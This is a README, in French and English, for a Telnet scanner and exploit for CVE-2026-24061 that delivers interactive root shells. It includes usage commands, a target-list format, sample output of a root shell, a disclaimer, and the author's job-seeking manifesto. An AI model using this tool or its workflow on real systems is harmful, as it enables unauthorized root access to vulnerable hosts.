
Abyssal is a high-performance Telnet vulnerability scanner for CVE-2026-24061, delivering root shells on vulnerable systems with false-positive detection.
Scanner et exploit de vulnérabilité Telnet CVE-2026-24061
Des profondeurs, nous nous élevons.
Multithread, détection des faux positifs, shell root interactif en cas de succès.
Ce projet a été créé par un professionnel de l'informatique expérimenté, avec des décennies de travail pratique dans la sécurité réseau, l'infrastructure et le développement logiciel. À 55 ans, je recherche activement de nouvelles opportunités—que ce soit comme employé à temps plein, indépendant ou collaborateur de projet. Si vous appréciez l'expérience, les connaissances techniques approfondies et une approche directe de la résolution de problèmes, contactons-nous.
📫 Je suis ouvert aux offres d'emploi dans le monde entier.
✉️ Contact : [[email protected]]
📖 Utilisation
Analyse de base (non interactive)
python3 abyssal.py -f targets.txt
Mode interactif (obtenir un shell en cas de succès)
python3 abyssal.py -f targets.txt --interactive
Options avancées
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
Options de la ligne de commande
Option Description
-f, --file Fichier contenant les adresses IP (défaut : ip_list.txt)
-t, --threads Nombre de threads parallèles (défaut : 10)
-i, --interactive Mode interactif — obtenir un shell sur les systèmes vulnérables
-o, --output Nom du fichier journal (généré automatiquement si non spécifié)
-c, --connect-timeout Délai de connexion en secondes (défaut : 5)
-s, --session-timeout Délai de session en secondes (défaut : 10)
--version Afficher les informations de version
-h, --help Afficher le message d'aide
📂 Format du fichier de cibles Créez un fichier avec une cible par ligne :
# Single IPs
192.168.1.100
10.0.0.50
# IP with custom port
192.168.1.200:2323
# Subnet (CIDR) — support coming soon
# 192.168.1.0/24
# Comments are allowed
172.16.1.25 # Office server
📊 Exemple de sortie
╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ █████╗ ██████╗ ██╗ ██╗███████╗███████╗ █████╗ ██╗ ║
║ ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║ ║
║ ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║ ║
║ ██╔══██║██╔══██╗ ╚██╔╝ ╚════██║╚════██║██╔══██║██║ ║
║ ██║ ██║██████╔╝ ██║ ███████║███████║██║ ██║███████╗ ║
║ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ║
║ ║
║ Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner ║
║ "From the depths, we rise." ║
║ ║
║ Built by: Klaus Baumdick ║
║ Contact: [email protected] ║
║ Status: Open for new opportunities worldwide ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════╝
⚠️ INTERACTIVE MODE ENABLED!
On REAL login prompt or shell, control will be passed to you.
False positives are automatically detected and ignored.
Press CTRL+C to abort.
Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================
🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] Session on 192.168.1.100:23 closed.
============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100
📊 SUMMARY:
✅ REAL VULNERABLE: 15
🔒 PROTECTED: 42
❓ FAILED: 23
🌐 UNREACHABLE: 20
⚠️ FALSE POSITIVES: 0
🚨 SECURITY WARNING:
15 system(s) are REALLY vulnerable to CVE-2026-24061!
→ Disable or patch Telnet immediately!
→ Use SSH as a secure alternative!
⚠️ Disclaimer
This tool is for authorized security testing and educational purposes only.
Only use on systems you own or have explicit written permission to test
Unauthorized access to computer systems is illegal
The author assumes no responsibility for misuse of this tool
Use responsibly and at your own risk
📝 Licence
Ce projet est sous licence MIT — consultez le fichier LICENSE pour plus de détails.
🤝 Se connecter
Klaus Baumdick 📫 E-mail : [email protected]
🔗 GitHub : github.com/stoerti2
📌 Statut : Ouvert aux nouvelles opportunités dans le monde entier
📚 Références
CVE-2026-24061
Vulnérabilité GNU InetUtils Telnetd
git clone https://github.com/stoerti2/abyssal.git
#┌────────────────────────────────────────────────────────────────────────┐
#│ │
#│ ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗ │
#│ ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║ │
#│ ███████╗ ██║ ██║ ██║█████╗ ██████╔╝ ██║ ██║ │
#│ ╚════██║ ██║ ██║ ██║██╔══╝ ██╔══██╗ ██║ ██║ │
#│ ███████║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║ │
#│ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ │
#│ │
#│ "old school, still root" │
#│ "stoerti - the jobless hacker" │
#│ │
#│ ┌──────────────────────────────────────────────────────────────┐ │
#│ │ 40 years in the trenches. │ 6 months unemployed in DE. │ │
#│ │ They fired the one who knew. │ This is my legacy. │ │
#│ │ -- no patches for reality -- │ │
#│ └──────────────────────────────────────────────────────────────┘ │
#│ │
#└────────────────────────────────────────────────────────────────────────┘
Qu'est-ce que Grindware ?
Grindware est un logiciel qui existe parce que personne ne me paie pour construire les choses qui comptent vraiment.
Je suis au chômage depuis six mois. Pas parce que je ne sais pas coder – mais parce que le marché ne se soucie plus des compétences. Il se soucie des mots à la mode, des certifications et des relations. Alors, au lieu d'attendre un emploi qui ne vient jamais, je construis.
Grindware est le résultat de cela.
Construit par nécessité – pas pour le profit, pas pour les investisseurs, pas pour une feuille de route produit. Construit parce que quelque chose devait exister et que personne d'autre n'allait le construire.
Publié gratuitement – parce que verrouiller du code derrière un paiement semble mal quand on sait ce que c'est que de n'avoir rien.
Honnête – pas de blabla marketing, pas d'absurdités « prêt pour l'entreprise ». Juste du code qui fonctionne.
Brut mais fonctionnel – il fait le travail. Si vous avez besoin d'une belle interface, allez voir ailleurs.
Parce que c'est ce que c'est. Du code écrit pendant la galère. Pendant les nuits tardives. Pendant le 47e refus d'embauche. Pendant les moments où l'on réalise que le système ne se soucie pas de vous, alors autant construire le vôtre.
Grindware est un code de survie.
Aux développeurs fatigués des conneries d'entreprise
Aux chercheurs en sécurité qui ont besoin d'outils qui fonctionnent vraiment
À tous ceux qui pensent que les logiciels devraient être utiles, pas seulement rentables
Aux personnes qui sont aussi dans la galère
Pas une entreprise
Pas une startup
Pas un produit
Pas à vendre
Grindware n'est que du code. D'un développeur au chômage au monde entier.
Si vous utilisez Grindware, c'est déjà suffisant. Si vous voulez le soutenir, vous pouvez :
⭐ Mettre une étoile au dépôt
🐛 Signaler des bugs
🔧 Contribuer au code
💬 Le partager avec quelqu'un qui pourrait en avoir besoin
Je suis toujours ouvert au travail. Si vous avez besoin d'un développeur qui construit réellement des choses, parlons-en.
Grindware – Construit dans la galère, publié gratuitement.
Pour toute question ou demande concernant ce jeu de données, veuillez contacter [email protected]
Dernière mise à jour : juillet 2026